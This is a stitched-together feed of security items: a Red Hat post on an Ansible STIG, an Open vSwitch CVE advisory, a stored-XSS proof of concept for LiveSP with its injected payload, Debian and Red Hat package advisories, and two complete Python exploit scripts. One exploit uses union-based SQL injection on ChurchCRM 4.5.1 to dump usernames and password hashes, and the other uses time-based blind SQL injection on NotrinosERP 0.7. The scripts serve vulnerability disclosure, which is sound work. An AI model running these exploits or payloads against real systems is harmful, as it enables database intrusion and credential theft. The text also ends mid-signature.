<p>As IT environments become more complex, especially as cloud-native technologies, cloud services and traditional hardware all interact to meet evolving business demands, automation remains a key organizational strategy. Automation helps manage and maintain operations at a greater scale, speed and agility. Greater IT complexity also dovetails with requirements for enhanced cybersecurity postures, with threats and vulnerabilities changing on a near daily basis. Automation and IT security are not mutually exclusive, but a guidebook to effective configurations that help keep operat

As IT environments become more complex, especially as cloud-native technologies, cloud services and traditional hardware all interact to meet evolving business demands, automation remains a key organizational strategy. Automation helps manage and maintain operations at a greater scale, speed and agility. Greater IT complexity also dovetails with requirements for enhanced cybersecurity postures, with threats and vulnerabilities changing on a near daily basis. Automation and IT security are not mutually exclusive, but a guidebook to effective configurations that help keep operations moving smoothly without compromising IT security needs.

For nearly two decades, Red Hat has been helping both public and private entities adapt to changing IT security requirements and concerns. Red Hat achieves a wide range of cybersecurity validations for our products in global markets and by providing actionable information for organizations to improve their system security footprint.

With this in mind, **the first Security Technical Implementation Guide (STIG) for the automation controller in Red Hat Ansible Automation Platform** is now published and available for download at the Department of Defense (DoD) Cyber Exchange. 

The STIG enables customers to deploy Ansible Automation Platform in accordance with a Defense Information Systems Agency (DISA) reference security baseline profile while still driving innovation forward with Red Hat automation. Customers can install and configure Ansible Automation Platform with compliance as a top priority, using best practices that meet the STIG architecture requirements. Using the critical security guidance, organizational approvals will be more attainable to get systems in production for security-conscious computing in a variety of regulated industries, from energy and banking to government and defense. 

This builds on Red Hat’s goal to extend a common IT automation solution that builds on a backbone of validated IT security components wherever organizations operate. This helps to unlock automation as a viable, reliable and innovative IT strategy for managing hybrid clouds at scale, even in sensitive environments. Ansible Automation Platform, by design, delivers enhanced support for organizations across varying industries, varying skill sets and varying environments on their automation journeys. Its flexible foundation, tools and services offer a deeper level of customization and control.

Download the published Ansible STIG now, and learn how you can use Ansible Automation Platform to orchestrate enterprise security systems. 

Red Hat is the world’s leading provider of enterprise open source software solutions, using a community-powered approach to deliver reliable and high-performing Linux, hybrid cloud, container, and Kubernetes technologies.

Read full bio

DISA releases the first Ansible STIG

A flaw was found in openvswitch (OVS). When processing an IP packet with protocol 0, OVS will install the datapath flow without the action modifying the IP header. This issue results (for both kernel and userspace datapath) in installing a datapath flow matching all IP protocols (nw_proto is wildcarded) for this flow, but with an incorrect action, possibly causing incorrect handling of other IP packets with a != 0 IP protocol that matches this dp flow.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[thread-next>\] \[day\] \[month\] \[year\] \[list\]

Date: Thu, 6 Apr 2023 19:37:53 +0200
From: Ilya Maximets <i.maximets@....org>
To: oss-security@...ts.openwall.com, ovs-announce@...nvswitch.org,
 ovs-discuss <ovs-discuss@...nvswitch.org>
Cc: i.maximets@....org, Aaron Conole <aconole@...hat.com>,
 Flavio Leitner <fbl@...hat.com>, David Marchand <david.marchand@...hat.com>
Subject: \[ADVISORY\] CVE-2023-1668: Open vSwitch: Remote traffic denial of
 service via crafted packets with IP proto 0

Description
===========

Multiple versions of Open vSwitch are vulnerable to crafted IP packets
with ip proto set to 0 causing a potential denial of service.
Triggering the vulnerability will require an attacker to send a crafted
IP packet with protocol field set to 0 and the flow rules to contain
'set' actions on other fields in the IP protocol header.  The resulting
flows will omit required actions, and fail to mask the IP protocol field,
resulting in a large bucket which captures all IP packets.

All versions of Open vSwitch at least as early as 1.5.0 are affected.

The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the identifier CVE-2023-1668 to this issue.


Mitigation
==========

For any version of Open vSwitch, preventing packets with network
protocol number '0' from reaching Open vSwitch will prevent the issue.
This is difficult to achieve because Open vSwitch obtains packets before
the iptables or nftables host firewall, so iptables or nftables on the
Open vSwitch host cannot ordinarily block the vulnerability.

Another method would be to add a high priority rule to the flow table
explicitly matching on nw protocol '0' and handling that traffic
separately:

    table=0 priority=32768,ip,nw\_proto=0,actions=drop
    table=0 priority=32768,ipv6,nw\_proto=0,actions=drop
    table=0 priority=32768,arp,arp\_op=0,actions=drop

All 3 OpenFlow rules should be added to every OVS bridge.  This can
be difficult to maintain during the service restart.


Fix
===

Patches to fix these vulnerabilities in Open vSwitch 2.13.x and newer:

\* 3.1.x:
  https://github.com/openvswitch/ovs/commit/61b39d8c4797f1b668e4d5e5350d639fca6082a9
\* 3.0.x:
  https://github.com/openvswitch/ovs/commit/0ec9af260ad84225e758d249fa32151ddf8a6520
\* 2.17.x:
  https://github.com/openvswitch/ovs/commit/27fb5db7f727ffc056f024f9ba4936facccb5f40
\* 2.16.x:
  https://github.com/openvswitch/ovs/commit/42f2b4b9b9a3c11d38f180bf1e35c47b77cd4ce8
\* 2.15.x:
  https://github.com/openvswitch/ovs/commit/f36509fd64e339ffd33593451099be6baa12ffe6
\* 2.14.x:
  https://github.com/openvswitch/ovs/commit/b46505f4d26cd4612a533687e7884efcb7a74111
\* 2.13.x:
  https://github.com/openvswitch/ovs/commit/7fa0106e8594c34f9e16efd87a58e38a947c6c5b

Recommendation
==============

We recommend that users of Open vSwitch apply the linked patches, or
upgrade to a known patched version of Open vSwitch.  These include:

\* 3.1.1
\* 3.0.4
\* 2.17.6
\* 2.16.7
\* 2.15.8
\* 2.14.9
\* 2.13.11


Acknowledgements
================

The Open vSwitch team wishes to thank the reporter:

      David Marchand <dmarchan@...hat.com>
**Download attachment "**OpenPGP\_0xB9F7EC77C829BF96.asc**" of type "**application/pgp-keys**" (4740 bytes)**

**Download attachment "**OpenPGP\_signature**" of type "**application/pgp-signature**" (841 bytes)**

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2023-1668: security - [ADVISORY] CVE-2023-1668: Open vSwitch: Remote traffic denial of service via crafted packets with IP proto 0

A cross-site scripting (XSS) vulnerability in LiveAction LiveSP v21.1.2 allows attackers to execute arbitrary web scripts or HTML.

**CVE-2023-24721 - Stored Cross-site Scripting (XSS)**

  

**Description**

An issue was discovered in LiveSP through v.21.1.2. A malicious user leveraging this vulnerability could inject arbitrary JavaScript code. The malicious payload will then be triggered every time an authenticated user browses the page containing it.

**POC**

Stored cross-site scripting (also known as second-order or persistent XSS) arises when an application receives data from an untrusted source and includes that data within its later HTTP responses in an unsafe way. The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes. Methods for introducing malicious content include any function where request parameters or headers are processed and stored by the application, and any out-of-band channel whereby data can be introduced into the application's processing space (for example, email messages sent over SMTP that are ultimately rendered within a web mail application).

Stored cross-site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users, and are not hindered by web browsers' XSS filters. Depending on the affected page, ordinary users may be exploited during normal use of the application. In some situations this can be used to create web application worms that spread exponentially and ultimately exploit all active users.

**Affected Endpoint**

*   **URL:** https://\[ip:port\]/va/service/bach/topology/element
*   **HTTP Post Parameter:** name

**Technical Details**

In this specific instance, using the API available under _/va/service/bach/topology/element_, it is possible to inject arbitrary JavaScript code within the _name_ POST parameter, as shown in the following HTTP Request/Response pair.

**HTTP Request:**

POST /va/service/bach/topology/element HTTP/1.1
Host: \[REDACTED\]
Cookie: \[REDACTED\]
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: \[REDACTED\]
X-Customer: \[REDACTED\]
Content-Type: application/json
Content-Length: 175
Origin: \[REDACTED\]
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

{"attributes":{"name":"\\"\><img src\='x' onerror\='alert(\\"pwned\\")'\>","extraLabel":""},"type":"cluster","keyType":"cluster:applicationUser","children":{"neType:application":\[\]}}

**HTTP Response:**

HTTP/1.1 201 Created
Server: \[REDACTED\]
Date: Wed, 04 Jan 2023 13:45:39 GMT
Content-Type: application/json
Content-Length: 902
Connection: close
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers:Accept,Accept-Language,APP-Platform,APP-Version,Content-Disposition,Content-Language,Content-Range,Content-Type,X-Customer,X-Debug,X-MT-Admin,X-UserScope,X-UserToken
Access-Control-Allow-Origin: \*
Referrer-Policy: strict-origin

\[...\]

As we note from the HTTP Response above, the exploit was successfully saved. At this point, when the user visits the _https://\[hostname:port\]/va/cluster_ web page, the exploit runs from the victim’s browser.

**Reference**

*   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24721

CVE-2023-24721: CVE/CVE-2023-24721.md at main · marcovntr/CVE

Debian Linux Security Advisory 5384-1 - Multiple security vulnerabilities have been discovered in OpenImageIO, a library for reading and writing images. Buffer overflows and out-of-bounds read and write programming errors may lead to a denial of service (application crash) or the execution of arbitrary code if a malformed image file is processed.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5384-1                   security@debian.org  
https://www.debian.org/security/                          Markus Koschany  
April 10, 2023                        https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : openimageio  
CVE ID         : CVE-2022-36354 CVE-2022-41639 CVE-2022-41649 CVE-2022-41684  
                 CVE-2022-41794 CVE-2022-41837 CVE-2022-41838 CVE-2022-41977  
                 CVE-2022-41981 CVE-2022-41988 CVE-2022-41999 CVE-2022-43592  
                 CVE-2022-43593 CVE-2022-43594 CVE-2022-43595 CVE-2022-43596  
                 CVE-2022-43597 CVE-2022-43598 CVE-2022-43599 CVE-2022-43600  
                 CVE-2022-43601 CVE-2022-43602 CVE-2022-43603  
Debian Bug     : 1027143 1027808

Multiple security vulnerabilities have been discovered in OpenImageIO, a  
library for reading and writing images. Buffer overflows and out-of-bounds  
read and write programming errors may lead to a denial of service  
(application crash) or the execution of arbitrary code if a malformed image  
file is processed.

For the stable distribution (bullseye), these problems have been fixed in  
version 2.2.10.1+dfsg-1+deb11u1.

We recommend that you upgrade your openimageio packages.

For the detailed security status of openimageio please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/openimageio

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmQz0zJfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD  
RjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7  
UeS2VhAAkzf+mdeKhMeJwj6tgMsq3GwyOvvyUwbCNxH31z43l+EX2SSLROOXfp8H  
N9pkxAPmMfkzNR77FFwKFyHmAMeHwQdO+9w4YQ+Bz2h1xs25snwW9k+4BFGvgZfc  
T4RF5l808YGPJWUoxS3EOfgVYAv7nYc/eSxHvLBSW/4uhsg9fzNeTvWbdGVATNDw  
2Fiy2b5uFeo+uBGveyhzd7sj+spe7cYdFklrSAirKA/QAh0cUlRVfP4uyQysO1iT  
/JK3+vXP+Xis7VmRADNLIfK8xnX5maW6Uru6IuHVHHFMqaSBYPw+1BwIfkz0n60A  
VL+wpVZ+eBdN1QM3srizcHfkB4ZuH/XU+NoNmKiCFPdmguwSPubH6NNEtqr4UHew  
29/PMcneOfGzjSf4tQ6Bk4wjhYEUOTiN3UAJ7Nc7xce92iapzzeHbulAMO9nROch  
KOUVyfauOBLWd5UTKSWGhlb/AWwGCBxhqBnumKRFS8t842xxsrMiufZBWM23q0fr  
smxfDs4uxUhmmQI4nCLUTCjLcFz50/flJNDKSTaRh5Vxu26wklxwFu0kFpiSxc2U  
3K6Ku+nH96ydlSjFLfKGP6L3+SPWzxaojpfxqgkjsA81k6/27arvamlZEb4+LC0D  
EuUmUYu9+6OYBmP6Qa/Awy+6tMX9x6DGtn2VOWpvyAD0xprGi0A=  
=mZTJ  
-----END PGP SIGNATURE-----

Debian Security Advisory 5384-1

ChurchCRM version 4.5.1 suffers from a remote authenticated SQL injection vulnerability.

    # Exploit Title: ChurchCRM 4.5.1 - Authenticated SQL Injection# Date: 11-03-2023# Exploit Author: Arvandy# Blog Post: https://github.com/arvandy/CVE/blob/main/CVE-2023-24787/CVE-2023-24787.md# Software Link: https://github.com/ChurchCRM/CRM/releases# Vendor Homepage: http://churchcrm.io/# Version: 4.5.1# Tested on: Windows, Linux# CVE: CVE-2023-24787"""The endpoint /EventAttendance.php is vulnerable to Authenticated SQL Injection (Union-based and Blind-based) via the Event GET parameter.This endpoint can be triggered through the following menu: Events - Event Attendance Reports - Church Service/Sunday School. The Event Parameter is taken directly from the query string and passed into the SQL query without any sanitization or input escaping.This allows the attacker to inject malicious Event payloads to execute the malicious SQL query.This script is created as Proof of Concept to retrieve the username and password hash from user_usr table."""import sys, requestsdef dumpUserTable(target, session_cookies):        print("(+) Retrieving username and password")    print("")    url = "%s/EventAttendance.php?Action=List&Event=2+UNION+ALL+SELECT+1,NULL,CONCAT('Perseverance',usr_Username,':',usr_Password),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+from+user_usr--+-&Type=Sunday School" % (target)    headers = {'Content-Type':'application/x-www-form-urlencoded','Cookie':'CRM-2c90cf299230a50dab55aee824ed9b08='+str(session_cookies)}                  r = requests.get(url, headers=headers)    lines = r.text.splitlines()        for line in lines:         if "<td >Perseverance" in line:            print(line.split("Perseverance")[1].split("</td>")[0])    def login(target, username, password):    target = "%s/session/begin" % (target)    headers = {'Content-Type': 'application/x-www-form-urlencoded'}    data = "User=%s&Password=%s" % (username, password)    s = requests.session()    r = s.post(target, data = data, headers = headers)    return s.cookies.get('CRM-2c90cf299230a50dab55aee824ed9b08')def main():    print("(!) Login to the target application")    session_cookies = login(target, username, password)               print("(!) Exploiting the Auth SQL Injection to retrieve the username and password hash")    dumpUserTable(target, session_cookies)    if __name__ == "__main__":    if len(sys.argv) != 4:        print("(!) Usage: python3 exploit.py <URL> <username> <password>")        print("(!) E.g.,: python3 exploit.py http://192.168.1.100/ChurchCRM user pass")        sys.exit(-1)    target = sys.argv[1]    username = sys.argv[2]    password = sys.argv[3]        main()

ChurchCRM 4.5.1 SQL Injection

NotrinosERP version 0.7 suffers from a remote authentication blind SQL injection vulnerability.

    # Exploit Title: NotrinosERP 0.7 - Authenticated Blind SQL Injection# Date: 11-03-2023# Exploit Author: Arvandy# Blog Post: https://github.com/arvandy/CVE/blob/main/CVE-2023-24788/CVE-2023-24788.md# Software Link: https://github.com/notrinos/NotrinosERP/releases/tag/0.7# Vendor Homepage: https://notrinos.com/# Version: 0.7# Tested on: Windows, Linux# CVE: CVE-2023-24788"""The endpoint /sales/customer_delivery.php is vulnerable to Authenticated Blind SQL Injection (Time-based) via the GET parameter OrderNumber. This endpoint can be triggered through the following menu: Sales - Sales Order Entry - Place Order - Make Delivery Against This Order.The OrderNumber parameter require a valid orderNumber value.This script is created as Proof of Concept to retrieve database name and version through the Blind SQL Injection that discovered on the application."""import sys, requestsdef injection(target, inj_str, session_cookies):        for j in range(32, 126):        url = "%s/sales/customer_delivery.php?OrderNumber=%s" % (target, inj_str.replace("[CHAR]", str(j)))        headers = {'Content-Type':'application/x-www-form-urlencoded','Cookie':'Notrinos2938c152fda6be29ce4d5ac3a638a781='+str(session_cookies)}                      r = requests.get(url, headers=headers)        res = r.text        if "NotrinosERP 0.7 - Login" in res:            session_cookies = login(target, username, password)            headers = {'Content-Type':'application/x-www-form-urlencoded','Cookie':'Notrinos2938c152fda6be29ce4d5ac3a638a781='+str(session_cookies)}            r = requests.get(url, headers=headers)        elif (r.elapsed.total_seconds () > 2 ):            return j    return Nonedef login(target, username, password):    target = "%s/index.php" % (target)    headers = {'Content-Type': 'application/x-www-form-urlencoded'}    data = "user_name_entry_field=%s&password=%s&company_login_name=0" % (username, password)    s = requests.session()    r = s.post(target, data = data, headers = headers)    return s.cookies.get('Notrinos2938c152fda6be29ce4d5ac3a638a781')    def retrieveDBName(session_cookies):       db_name = ""    print("(+) Retrieving database name")    for i in range (1,100):        injection_str = "15+UNION+SELECT+IF(ASCII(SUBSTRING((SELECT+DATABASE()),%d,1))=[CHAR],SLEEP(2),null)-- -" % i        retrieved_value = injection(target, injection_str, session_cookies)        if (retrieved_value):            db_name += chr(retrieved_value)                    else:            break    print("Database Name: "+db_name) def retrieveDBVersion(session_cookies):    db_version = ""    print("(+) Retrieving database version")    for i in range (1,100):        injection_str = "15+UNION+SELECT+IF(ASCII(SUBSTRING((SELECT+@@version),%d,1))=[CHAR],SLEEP(2),null)-- -" % i        retrieved_value = injection(target, injection_str, session_cookies)        if (retrieved_value):            db_version += chr(retrieved_value)            sys.stdout.flush()        else:            break    print("Database Version: "+db_version)def main():    print("(!) Login to the target application")    session_cookies = login(target, username, password)           print("(!) Exploiting the Blind Auth SQL Injection to retrieve database name and versions")    retrieveDBName(session_cookies)    print("")    retrieveDBVersion(session_cookies)    if __name__ == "__main__":    if len(sys.argv) != 4:        print("(!) Usage: python3 exploit.py <URL> <username> <password>")        print("(!) E.g.,: python3 exploit.py http://192.168.1.100/NotrinosERP user pass")        sys.exit(-1)    target = sys.argv[1]    username = sys.argv[2]    password = sys.argv[3]        main()

NotrinosERP 0.7 SQL Injection

Red Hat Security Advisory 2023-1549-01 - Virtual Network Computing is a remote display system which allows users to view a computing desktop environment not only on the machine where it is running, but from anywhere on the Internet and from a wide variety of machine architectures. TigerVNC is a suite of VNC servers and clients. Issues addressed include privilege escalation and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: tigervnc security update  
Advisory ID:       RHSA-2023:1549-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1549  
Issue date:        2023-04-03  
CVE Names:         CVE-2023-1393   
=====================================================================

1. Summary:

An update for tigervnc is now available for Red Hat Enterprise Linux 8.2  
Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications  
Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP  
Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream AUS (v. 8.2) - aarch64, noarch, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream E4S (v. 8.2) - aarch64, noarch, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream TUS (v. 8.2) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Virtual Network Computing (VNC) is a remote display system which allows  
users to view a computing desktop environment not only on the machine where  
it is running, but from anywhere on the Internet and from a wide variety of  
machine architectures. TigerVNC is a suite of VNC servers and clients.

Security Fix(es):

* xorg-x11-server: X.Org Server Overlay Window Use-After-Free Local  
Privilege Escalation Vulnerability (CVE-2023-1393)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2180288 - CVE-2023-1393 xorg-x11-server: X.Org Server Overlay Window Use-After-Free Local Privilege Escalation Vulnerability

6. Package List:

Red Hat Enterprise Linux AppStream AUS (v. 8.2):

Source:  
tigervnc-1.9.0-15.el8_2.3.src.rpm

aarch64:  
tigervnc-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-debuginfo-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-debugsource-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-server-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-server-debuginfo-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-server-minimal-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-server-minimal-debuginfo-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-server-module-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-server-module-debuginfo-1.9.0-15.el8_2.3.aarch64.rpm

noarch:  
tigervnc-icons-1.9.0-15.el8_2.3.noarch.rpm  
tigervnc-license-1.9.0-15.el8_2.3.noarch.rpm  
tigervnc-server-applet-1.9.0-15.el8_2.3.noarch.rpm

ppc64le:  
tigervnc-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-debuginfo-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-debugsource-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-server-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-server-debuginfo-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-server-minimal-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-server-minimal-debuginfo-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-server-module-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-server-module-debuginfo-1.9.0-15.el8_2.3.ppc64le.rpm

s390x:  
tigervnc-1.9.0-15.el8_2.3.s390x.rpm  
tigervnc-debuginfo-1.9.0-15.el8_2.3.s390x.rpm  
tigervnc-debugsource-1.9.0-15.el8_2.3.s390x.rpm  
tigervnc-server-1.9.0-15.el8_2.3.s390x.rpm  
tigervnc-server-debuginfo-1.9.0-15.el8_2.3.s390x.rpm  
tigervnc-server-minimal-1.9.0-15.el8_2.3.s390x.rpm  
tigervnc-server-minimal-debuginfo-1.9.0-15.el8_2.3.s390x.rpm

x86_64:  
tigervnc-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-debuginfo-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-debugsource-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-server-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-server-debuginfo-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-server-minimal-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-server-minimal-debuginfo-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-server-module-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-server-module-debuginfo-1.9.0-15.el8_2.3.x86_64.rpm

Red Hat Enterprise Linux AppStream E4S (v. 8.2):

Source:  
tigervnc-1.9.0-15.el8_2.3.src.rpm

aarch64:  
tigervnc-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-debuginfo-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-debugsource-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-server-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-server-debuginfo-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-server-minimal-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-server-minimal-debuginfo-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-server-module-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-server-module-debuginfo-1.9.0-15.el8_2.3.aarch64.rpm

noarch:  
tigervnc-icons-1.9.0-15.el8_2.3.noarch.rpm  
tigervnc-license-1.9.0-15.el8_2.3.noarch.rpm  
tigervnc-server-applet-1.9.0-15.el8_2.3.noarch.rpm

ppc64le:  
tigervnc-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-debuginfo-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-debugsource-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-server-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-server-debuginfo-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-server-minimal-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-server-minimal-debuginfo-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-server-module-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-server-module-debuginfo-1.9.0-15.el8_2.3.ppc64le.rpm

s390x:  
tigervnc-1.9.0-15.el8_2.3.s390x.rpm  
tigervnc-debuginfo-1.9.0-15.el8_2.3.s390x.rpm  
tigervnc-debugsource-1.9.0-15.el8_2.3.s390x.rpm  
tigervnc-server-1.9.0-15.el8_2.3.s390x.rpm  
tigervnc-server-debuginfo-1.9.0-15.el8_2.3.s390x.rpm  
tigervnc-server-minimal-1.9.0-15.el8_2.3.s390x.rpm  
tigervnc-server-minimal-debuginfo-1.9.0-15.el8_2.3.s390x.rpm

x86_64:  
tigervnc-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-debuginfo-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-debugsource-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-server-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-server-debuginfo-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-server-minimal-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-server-minimal-debuginfo-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-server-module-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-server-module-debuginfo-1.9.0-15.el8_2.3.x86_64.rpm

Red Hat Enterprise Linux AppStream TUS (v. 8.2):

Source:  
tigervnc-1.9.0-15.el8_2.3.src.rpm

aarch64:  
tigervnc-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-debuginfo-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-debugsource-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-server-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-server-debuginfo-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-server-minimal-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-server-minimal-debuginfo-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-server-module-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-server-module-debuginfo-1.9.0-15.el8_2.3.aarch64.rpm

noarch:  
tigervnc-icons-1.9.0-15.el8_2.3.noarch.rpm  
tigervnc-license-1.9.0-15.el8_2.3.noarch.rpm  
tigervnc-server-applet-1.9.0-15.el8_2.3.noarch.rpm

ppc64le:  
tigervnc-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-debuginfo-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-debugsource-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-server-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-server-debuginfo-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-server-minimal-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-server-minimal-debuginfo-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-server-module-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-server-module-debuginfo-1.9.0-15.el8_2.3.ppc64le.rpm

s390x:  
tigervnc-1.9.0-15.el8_2.3.s390x.rpm  
tigervnc-debuginfo-1.9.0-15.el8_2.3.s390x.rpm  
tigervnc-debugsource-1.9.0-15.el8_2.3.s390x.rpm  
tigervnc-server-1.9.0-15.el8_2.3.s390x.rpm  
tigervnc-server-debuginfo-1.9.0-15.el8_2.3.s390x.rpm  
tigervnc-server-minimal-1.9.0-15.el8_2.3.s390x.rpm  
tigervnc-server-minimal-debuginfo-1.9.0-15.el8_2.3.s390x.rpm

x86_64:  
tigervnc-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-debuginfo-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-debugsource-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-server-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-server-debuginfo-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-server-minimal-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-server-minimal-debuginfo-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-server-module-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-server-module-debuginfo-1.9.0-15.el8_2.3.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-1393  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZDE1l9zjgjWX9erEAQj8Fg//diYgICEnqTMf1csN3bfDt+nKgiBXRzNO  
